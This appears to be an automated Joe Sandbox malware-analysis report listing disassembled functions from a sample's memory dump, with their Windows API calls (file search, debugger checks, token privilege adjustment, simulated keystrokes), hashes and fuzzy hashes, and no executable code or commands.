                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($|
                                                      • API String ID: 1659193697-1631851259
                                                      • Opcode ID: da7854c032068076e7eeb66c3b76313dc8873b77e0d13a29df77a7b77236d914
                                                      • Instruction ID: eb39489d8f00cd45b70e3a41c316e7982b5f1f311be5a161bf1357d8fa8a1af8
                                                      • Opcode Fuzzy Hash: da7854c032068076e7eeb66c3b76313dc8873b77e0d13a29df77a7b77236d914
                                                      • Instruction Fuzzy Hash: F6324975A006059FC728DF59C480AAAB7F0FF48760B55C46EE49ADB3A1EB70E942DB40
                                                      Function 00F95C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F95CC1
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00F95D17
                                                      • FindClose.KERNEL32(?), ref: 00F95D5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 4b0552af105586b03aeaa5eb4e45fc9c75d68729038e9877e3d9a95d79241392
                                                      • Instruction ID: abeabad20b86d46ee041ebfa81a2f7deb290f3556827c4243738eeebd8dcaf30
                                                      • Opcode Fuzzy Hash: 4b0552af105586b03aeaa5eb4e45fc9c75d68729038e9877e3d9a95d79241392
                                                      • Instruction Fuzzy Hash: E251BC34A046019FDB15DF28D894A9AB7E4FF49324F14855EE95A8B3A2CB30ED04DF91
                                                      Function 00F52622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 00F5271A
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F52724
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00F52731
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 931b35a8f28a9918990a9b0d0e48cec980ccb75f0dcd980b1d49ec67a0b7911f
                                                      • Instruction ID: 7d028e433d2f9c0ab29b491ec656d49fdc7b3ecf8d89c1ebc061510fc5bfd64f
                                                      • Opcode Fuzzy Hash: 931b35a8f28a9918990a9b0d0e48cec980ccb75f0dcd980b1d49ec67a0b7911f
                                                      • Instruction Fuzzy Hash: 9C31D87491121C9BCB61DF64DC88BDDBBB8AF08310F5042EAE90CA7261E7349F859F85
                                                      Function 00F951CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F951DA
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F95238
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00F952A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      • Opcode ID: ff11db67a1254f2e106e9586cbd6867cd39d59ac2985483003a39953701e181f
                                                      • Instruction ID: 20c69271e0b27b6b299ad7248cd64de28126156c1c281172be6ac6ff62a18ae5
                                                      • Opcode Fuzzy Hash: ff11db67a1254f2e106e9586cbd6867cd39d59ac2985483003a39953701e181f
                                                      • Instruction Fuzzy Hash: D2313075A00518DFDB00DF54D8C4EADBBB4FF49314F088099E905AB362DB35E855DBA0
                                                      Function 00F816C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F3FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00F40668
                                                        • Part of subcall function 00F3FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00F40685
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F8170D
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F8173A
                                                      • GetLastError.KERNEL32 ref: 00F8174A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                      • String ID:
                                                      • API String ID: 577356006-0
                                                      • Opcode ID: f380507a83b86d61031e86ab03b11b48ea8267df7518c187d6a527a54390e69f
                                                      • Instruction ID: 4dc844d49069e1343f44e7e53db3f9ec3e25f774be8e6aed454aa600e720e8fb
                                                      • Opcode Fuzzy Hash: f380507a83b86d61031e86ab03b11b48ea8267df7518c187d6a527a54390e69f
                                                      • Instruction Fuzzy Hash: BF1182B2804208AFD718AF54DCC6DABB7BDFB44764B20862EF05656241EB70BC469B60
                                                      Function 00F8D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F8D608
                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00F8D645
                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F8D650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID:
                                                      • API String ID: 33631002-0
                                                      • Opcode ID: 9a94926d4a1ae67cf8f4bf1a32c858721642afd276f3446600c70c8edf98c51d
                                                      • Instruction ID: b2157122699afd785cca8a87013fb05e23abc7348716101dc4dd36f483e8d24d
                                                      • Opcode Fuzzy Hash: 9a94926d4a1ae67cf8f4bf1a32c858721642afd276f3446600c70c8edf98c51d
                                                      • Instruction Fuzzy Hash: 7A113C75E05228BBDB109F99AC85FAFBBBCEB45B60F108125F904E7290D6704A059BA1
                                                      Function 00F81663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F8168C
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F816A1
                                                      • FreeSid.ADVAPI32(?), ref: 00F816B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: bc6988f266e6e1495833688483b46892ceebcbba130816b887bf922891a57ff8
                                                      • Instruction ID: 23111864273c3b6257b95046360c6c34e9853abd8abb5c9dee034deb178bd15f
                                                      • Opcode Fuzzy Hash: bc6988f266e6e1495833688483b46892ceebcbba130816b887bf922891a57ff8
                                                      • Instruction Fuzzy Hash: EBF0F47195030DFBDB00EFE49C89AAEBBBCFB08644F504665E501E2181E774AA449BA0
                                                      Function 00F44CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00F528E9,?,00F44CBE,00F528E9,00FE88B8,0000000C,00F44E15,00F528E9,00000002,00000000,?,00F528E9), ref: 00F44D09
                                                      • TerminateProcess.KERNEL32(00000000,?,00F44CBE,00F528E9,00FE88B8,0000000C,00F44E15,00F528E9,00000002,00000000,?,00F528E9), ref: 00F44D10
                                                      • ExitProcess.KERNEL32 ref: 00F44D22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 044dd6e60393634a02e3903701c1bbf8a3da4b3a24cce574537a095ba4289f72
                                                      • Instruction ID: 9c1c86f37c0a273ca63a557d194ce9ef8e5878e743a0220b876b24f1c81511ea
                                                      • Opcode Fuzzy Hash: 044dd6e60393634a02e3903701c1bbf8a3da4b3a24cce574537a095ba4289f72
                                                      • Instruction Fuzzy Hash: 0DE0B631800149ABCF11AF54DD49A593FB9EB41791B544118FD45AA222CB39ED42EE80
                                                      Function 00F5C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /
                                                      • API String ID: 0-2043925204
                                                      • Opcode ID: 845998db76b5b177eb9d4cec8eea387f00c622bbf9254ea7bfd000a70f17219b
                                                      • Instruction ID: 554f7b863b6678558beb1dfa26c0d3220867708fc23dcffee5bfe7718e6f3ae3
                                                      • Opcode Fuzzy Hash: 845998db76b5b177eb9d4cec8eea387f00c622bbf9254ea7bfd000a70f17219b
                                                      • Instruction Fuzzy Hash: DF4126729003186FCB209FB9CC89EBB77B8EB84325F504269FE06C7180E6709D859B90
                                                      Function 00F7D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00F7D28C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID: X64
                                                      • API String ID: 2645101109-893830106
                                                      • Opcode ID: 6da4ff1910995acdc1934e6c602a5540ec61a2aafe2582b2ace82c1bfaf40bd1
                                                      • Instruction ID: c91d87330b3bb537ef243f15e597019986b4be05a0e1eec15e371b1a0382662e
                                                      • Opcode Fuzzy Hash: 6da4ff1910995acdc1934e6c602a5540ec61a2aafe2582b2ace82c1bfaf40bd1
                                                      • Instruction Fuzzy Hash: 14D0C9B580111DEBCB94DB90ECC8EDEB37CBB04345F104252F506E2000DB309549AF10
                                                      Function 00F4CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                      • Instruction ID: 35a14923dc98218f273d01919280d5c2c4cee03ea5cfa8d9800e43a88d938ee0
                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                      • Instruction Fuzzy Hash: 56023D72E012199FDF54CFA9C8806ADFBF1FF88324F258169D919E7380D731AA419B94
                                                      Function 00F968EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F96918
                                                      • FindClose.KERNEL32(00000000), ref: 00F96961
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: 7ccc20e39cd83b9495357c4b319fe6e345347af643905606157d53555301bd29
                                                      • Instruction ID: 9601cdb90a0e00ecef9a6efe4c5521941307e7b611e26648af2535c15472c718
                                                      • Opcode Fuzzy Hash: 7ccc20e39cd83b9495357c4b319fe6e345347af643905606157d53555301bd29
                                                      • Instruction Fuzzy Hash: 961190316042109FDB10DF29D885A1ABBE5FF89328F15C699E4698F6A2C734EC05DBD1
                                                      Function 00F937B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00FA4891,?,?,00000035,?), ref: 00F937E4
                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00FA4891,?,?,00000035,?), ref: 00F937F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: 4329d1d5df5778f786f96cb71c7c22cc66d6b1980a9fa54ff4521a5b107119ef
                                                      • Instruction ID: 5f3e2401e95d04a63d23b099e8a4efc97da00ac52e7813874c932d8010cf84e0
                                                      • Opcode Fuzzy Hash: 4329d1d5df5778f786f96cb71c7c22cc66d6b1980a9fa54ff4521a5b107119ef
                                                      • Instruction Fuzzy Hash: A2F0EC716042292AEB2017A55C4DFDB369DEFC4761F000265F509D2191D5605904D6F1
                                                      Function 00F8B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F8B25D
                                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00F8B270
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: InputSendkeybd_event
                                                      • String ID:
                                                      • API String ID: 3536248340-0
                                                      • Opcode ID: 6c966f8df11bfa9ab93533ad51193f2e0dfeedb8b5d9affc2fdf8237d6b47439
                                                      • Instruction ID: 2bba066013d0924533c5bea8a8bd79777861228c0a79deb5fb5bd0310683e3bd
                                                      • Opcode Fuzzy Hash: 6c966f8df11bfa9ab93533ad51193f2e0dfeedb8b5d9affc2fdf8237d6b47439
                                                      • Instruction Fuzzy Hash: 23F06D7180424DABDB059FA0C805BEE7BB0FF04305F008009F951A5191C7798201AF94
                                                      Function 00F810BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F811FC), ref: 00F810D4
                                                      • CloseHandle.KERNEL32(?,?,00F811FC), ref: 00F810E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: f82e3ab6b68bd9fef48e1921d85039fbeb80cea29f41ccc8cd3fe540c21df8cc
                                                      • Instruction ID: f0925801ca95378b5200bc4adb731cb49141a3feaf6eacffbee1b8e83464afe1
                                                      • Opcode Fuzzy Hash: f82e3ab6b68bd9fef48e1921d85039fbeb80cea29f41ccc8cd3fe540c21df8cc
                                                      • Instruction Fuzzy Hash: 9BE0BF72418610AFF7252B51FC09E7777E9EB04320F14892DF5A5804B5DB626C91EB50
                                                      Function 00F2CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Variable is not of type 'Object'., xrefs: 00F70C40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable is not of type 'Object'.
                                                      • API String ID: 0-1840281001
                                                      • Opcode ID: 3e5f7f18207cd3340d812f4c6efb6b5e8a88a5c23a58d5a22b6a08823c1d8bd6
                                                      • Instruction ID: 19e00d12fe6051391225acb4dd9ef76eabd6019e92c3e71409c7cf551c1343bc
                                                      • Opcode Fuzzy Hash: 3e5f7f18207cd3340d812f4c6efb6b5e8a88a5c23a58d5a22b6a08823c1d8bd6
                                                      • Instruction Fuzzy Hash: DA32A171D00228DBCF14DF90E981BEDB7B5BF05314F54805AE80AAB281DB75AD45EBA1
                                                      Function 00F5676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F56766,?,?,00000008,?,?,00F5FEFE,00000000), ref: 00F56998
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: ba0fe2cbd89d1104abc70246c46ce5f39002e2a64d93fcab36b1d7cb9c6718e9
                                                      • Instruction ID: 69a5ef5dbe0ac39e2a4f9b76505f5a647fb9698a8c516ba164072c7f3f508c5e
                                                      • Opcode Fuzzy Hash: ba0fe2cbd89d1104abc70246c46ce5f39002e2a64d93fcab36b1d7cb9c6718e9
